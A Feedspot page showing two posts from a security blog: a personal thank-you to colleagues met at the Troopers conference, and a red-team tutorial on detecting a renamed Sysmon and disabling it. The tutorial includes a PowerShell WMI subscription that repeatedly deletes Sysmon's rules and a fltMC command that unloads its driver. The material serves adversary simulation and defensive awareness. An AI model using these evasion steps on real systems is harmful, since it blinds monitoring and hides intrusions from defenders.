Loading...

Follow Shell is Only the Beginning - Sharing my thoughts .. on Feedspot

Continue with Google
Continue with Facebook
or

Valid

Recently while in the bar of the Crown Plaza in Heidelberg for the Troopers conference I became aware of the number of how grateful I should be for what I have in this industry. For what I’m grateful for is not technical or recognition but of the group of people in the industry, I have the honor to call friends.

I would like to share some of them in this blog post. While coming back from dinner at Heidelberg JD also known as @SadProcessor send me a DM that several of our friends are at the hotel bar and even so I don't drink I should come down and hang out. I was jet lag but had not seen many of them in months so I said to myself “Why not” so I went down.

Let me start with JD, he is one of the most humble persons I know, his love for his kids rivals my own for mine. He was one of the main reason that I loved the conference so much, he helped me navigate the conference, the foreign languages, we talk about our passion for technology, PowerShell and much much more. We had some heart to heart talks and always greeted and parted ways with a hug. He is a true professional and great human being.

When I came into the bar I was immediately greeted by the professional tag team that created BloodHound, @Wald0 (Andy) and @CptJesus (Rohan) these two guys are awesome. While at a previous conference I got some bad news over the phone that crushed my energy levels. These to guys pulled me from my rut with the help of my good co-worker and friend Oddvar and took me to karaoke for the first time in my life. Rohan and I share a dark sense of humor and I really wish I could have his comedic timing in my presentations in addition to his technical skills. Both are very professional and caring people. What I admire the most from Andy is his dedication to the community, always typing personally welcome messages into the BloodHound Slack for a new member,  to helping others through his projects to help charity.

@harmj0y is next, “The Sexy Will Harmj0y” as I called him in my dark comedic way during class were referencing his tools. I have not met anyone else in this industry with his level of passion and determination when researching a subject. He an I spent some time talking about the industry, Kerberos, DPAPI and many other subjects. I meet Will many years ago in Maryland, from that time to now I’m amazed at the level of expertise in multiple subjects through hard work.

@Tifink_ (Lee Christensen) is the quiet one of the group but one of the most skilled people a know. We chat quite a bit on tradecraft and admire his ability to think out of the box. I have not met one single person in the SpecterOps crew that has not told me a story on how they have been stuck on something and Lee has come up with a solution. A true master of thinking outside the box.

@Pytotek3 (Sean Metcalf) of ADSecurity.org is next. He has been a friend for many many years, I admire his warm heart, always positive attitude, the impeccable work ethic that pushes me to be a better presenter and passion to share knowledge. I have to say his hugs rival those of Dave Kennedy. I'm honored to call him a close friend.

@JaredHaigh (Jared Haight) t was returning to the hotel, I had dinner with him earlier with him, his wife and @CuriousJack (Jason Lang) a coworker and friend. Jared has to be one of the most humble and caring professionals I know in this industry. His positive attitude is matched by his technical skills. After Maria, he and some friends from SpecterOps and Microsoft sent a care package to my family, I will always be grateful to all for that.   

@gentilkiwi (Benjamin Delpy) What can I say, this guy is simply awesome. We went in deep discussions on Kerberos, DPAPI, not commonly known capabilities of Mimikatz, shared our similar views on disclosure and release of tools, dev labs and much more. Planning on doing a Mimikatz and Kekeo Training this year and he has been always available to help, clarify doubts and answer questions. He is another humble member of our community that truly cares about making the world a more secure place.

@FuzzzyNoise (Kelly) she is a member of the SpecterOps crew and a lady that I know admire greatly. She shows a passion for the work, sharing and building up the community like no other I have seen. I was honored to spend time chatting with her.

Now, these are only a handful of the people I got to talk that night. But they are the ones I reminisce the most when I think of the positive impact their personalities and presence brought. We complained many times about the community but rarely we focus on those close to us that are part of our tribe that has to influence upon us. At the bar that night I looked around me and felt honored to be in their presence and grateful for the company. Many of them in their way had an influence on how I thought and viewed stuff for many years. I’m grateful for the company, for the learning and most of all for the passion they have with sharing and working to make all more secure.

In the rest of the week their more people from Rachelle who wilded her organizational magic to make Troopers happen, to the speakers I got to talk to, the twitter friends I got to meet in person and to the great students in the class. The class was a small one and got to know most well and felt so proud of the opportunity to share some information with them.


Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog post and even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is for the tracking of potentially malicious activity on individual hosts and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information in to the Windows Eventlog so it is easier to be able to collect the information with the use of SIEM (Security Information and Event Management) tools. 

 Sysmon has the capability to log information for:

  • Process Creation and Termination

  • Process changing a file creation time.

  • Network Connection

  • Driver Load

  • Image Load

  • CreateRemoteThread

  • Raw Access Read of a file

  • A process opens another process memory

  • File Creation

  • Registry Events

  • Pipe Events

  • WMI Permanent Events 

 All of the logging is based on rules you specify using the sysmon.exe tool and saved in to the registry. Most enterprise environments will deploy Sysmon via package management and then push rules via the registry by pushing the binary blob to the hosts. 

Detect Control

 As offensive operators the first thing we need to do is identify if Sysmon is present on the system. Normally when we install Sysmon on a system it will create a service to load a driver, the registry key that will store the configuration for the service and the driver and install an event manifest to define the events and create the event log where it will put the events it generates so they can be collected. So, we have multiple places we can look. But sadly, most attackers are creatures of habit and will many times stick to the simplest solution that gives them the most bag for the buck you can say. In the case of detecting controls there is no difference most will perform one of the following actions:

  • List processes

  • List services

  • List drivers in C:\Windows\System32\Drivers

 The most common one is the listing of drivers since EDR solutions like Cylance will hide the service name depending how you call it and some solutions do not have processes running. 

 For this very reason Sysmon implement a feature where you can change the name of the exe and the driver so as to obfuscate its presence on the system. 

 To change the name of the service and the process you just rename the sysmon executable to whatever name you want. This is useful but as we can see in the output bellow the driver is not renamed. 

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i
System Monitor v8.00 - System activity monitor
Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

HPPrinterController installed.
SysmonDrv installed.
Starting SysmonDrv.
SysmonDrv started.
Starting HPPrinterController..
HPPrinterController started.

To change the driver name we would need to specify it with the -d parameter during installation and specify a name for it. 

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i -d hpprndrv


System Monitor v8.00 - System activity monitor
Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier
Sysinternals - www.sysinternals.com

HPPrinterController installed.
hpprndrv installed.
Starting hpprndrv.
hpprndrv started.
Starting HPPrinterController..
HPPrinterController started.

One thing to take in to account for uninstalling and updating the configuration of the service one has to use and copy of sysmon with the name we choose and the registry path for the configuration will also use the name we choose, this is very important during regular operation of upgrading sysmon and pushing out new rules. 

 We can still look at the filter drivers that have been loaded by the system and look at their altitude numbers using fltmc.exeor if our agent we are using it be Meterpreter, Beacon or any other with support for mimikatz we can also use mimikatz with the command misc::mfltto list in memory the driver altitude numbers. The sysmon driver will have an altitude number of 385201

With Mimikatz

mimikatz # misc::mflt
0 3     385201 hpprndrv
0 0     244000 storqosflt
0 1     189900 wcifs
0 0     180451 CldFlt
0 0     141100 FileCrypt
0 1     135000 luafv
0 1      46000 npsvctrig
0 3      40700 Wof
0 4      40500 FileInfo

With fltMC.exe:

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

If we are operating in a more contested or non-permissive environment where running fltmc.exe or loading mimikatz is bound to raise alarms. A not so accurate way would be to check for the presence of the event log file for sysmon. It will at least let us know that sysmon is present or was installed on the system. For this we can check the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational

PS C:\> ls HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels | Where-Object {$_.name -like "*sysmon*"}


    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels


Name                           Property
----                           --------
Microsoft-Windows-Sysmon/Opera OwningPublisher : {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
tional                         Enabled         : 1
                               Isolation       : 2
                               ChannelAccess   : O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x1;;;BO)(A;;0x1;;;SO)(A;;0x1;;;S-1-5-32-573)
                               MaxSize         : 67108864
                               MaxSizeUpper    : 0
                               Type            : 1

Other signs we can look in the registry is the registry key that all sysinternals tools populate to say set that the license was accepted for the tool. In the case of sysmon it will be listed in that key under HKCU\Software\Sysinternalsfor the user. 

PS C:\> ls HKCU:\Software\Sysinternals  | Select-Object name

Name
----
HKEY_CURRENT_USER\Software\Sysinternals\Process Explorer
HKEY_CURRENT_USER\Software\Sysinternals\Process Monitor
HKEY_CURRENT_USER\Software\Sysinternals\sigcheck
HKEY_CURRENT_USER\Software\Sysinternals\Streams
HKEY_CURRENT_USER\Software\Sysinternals\Strings
HKEY_CURRENT_USER\Software\Sysinternals\System Monitor
HKEY_CURRENT_USER\Software\Sysinternals\ZoomIt

There is also a way to find the service and now if there was a rename. Sysmon keeps the description of the service as “System Monitor service”even when it modified the name. This makes it trivial to identify the service by this string using WMI or SC.exe. 

PS C:\> Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"

ProcessId Name                StartMode State   Status ExitCode
--------- ----                --------- -----   ------ --------
2220      HPPrinterController Auto      Running OK     0
 Circumventing Sysmon Working Around Rules

We have 2 options to circumvent sysmon the first one is to operate inside the blind spots of its rules set or to completely disable. Matt Grabber was able to reverse engineer and make public the format of the registry key and we can find a .Net assembly we can use in Cobalt Strike load assembly to read in memory the config written by HarmJ0y called Seatbelt https://github.com/GhostPack/Seatbeltor if we pull the registry key Matt has a PowerShell function to parse it https://github.com/mattifestation/PSSysmonTools/blob/master/PSSysmonTools/Code/SysmonRuleParser.ps1. By knowing the rules, we can operate around them. 

Deleting Configuration

We can clear the rule entry in the registry. Sysmon will see the registry being changed and it will automatically reload the configuration and since no rules are present it will be blinded temporarily depending on how the configuration is maintained. If the configuration is managed by a configuration management system like Ansible, Chef or DSC it could be a matter of seconds to minutes before the configuration is changed back to its original state in the case it is by a GPO it can be restored inside 90 minutes when the GPO updates. To combat this we can create in any Windows technology (.Net, VBS, PE File ..etc) a WMI Temporary Consumer https://docs.microsoft.com/en-us/windows/desktop/wmisdk/receiving-a-wmi-eventthat will monitor the registry key and when it notices a change to it to delete it or set its content again. The reason for a temporary consumer is that most solution look for WMI Permanent events being created or modified. 

$query = "SELECT * FROM RegistryKeyChangeEvent " + 
    "WHERE Hive ='HKEY_LOCAL_MACHINE' " + 
    "AND KeyPath ='SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters'"

Register-WMIEvent -Query $query -Action { 
    Write-host "Sysmon config updated, deleting config."
    Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters" -Name "Rules" }  

One of the things to keep in mind is that Sysmon will revert back to default configuration so it will log the process creation and process termination events.

Unload SysmonDrv Filter Driver

Another action that can be taken is to unload the SysmonDrv dfilter driver that gives Sysmon the information on all disk actions to then write to the eventlog. As we saw before this driver has a unique altitude number and if we are running as administrator we can unload this driver and Sysmon is essentially blinded completely. We can unload the driver with the fltmc.exe tool. Here we are unloading our hidden driver that we identified via the altitude number.

PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
hpprndrv                                3       385201         0
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0
PS C:\> fltMC.exe unload hpprndrv
PS C:\> fltMC.exe

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
storqosflt                              0       244000         0
wcifs                                   1       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                     3        40700         0
FileInfo                                4        40500         0

Sysmon will actually log as its last command the execution of the command so this could be a trigger on SIEM when this command is executed and the unload parameter is used.

Conclusion

When identifying controls in an adversarial simulation is to look for more than one indicator of the presence of the control and when identified to pull the pertinent pieces of information that will inform us of the level of maturity and skill of the team of the targeted network. 

As always, I hope you find this blog post useful and informative. 

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview